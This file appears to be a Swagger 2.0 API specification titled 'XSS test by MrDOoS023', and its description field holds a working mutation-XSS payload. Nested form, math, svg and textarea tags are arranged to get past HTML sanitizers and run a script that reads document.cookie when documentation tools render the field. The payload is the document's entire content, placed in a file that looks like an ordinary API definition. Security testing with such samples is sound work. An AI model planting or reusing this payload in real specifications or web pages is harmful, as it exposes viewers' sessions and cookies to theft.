swagger: '2.0'
info:
  title: XSS test by MrDOoS023
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script> alert(document.cookie)</script>"></form>
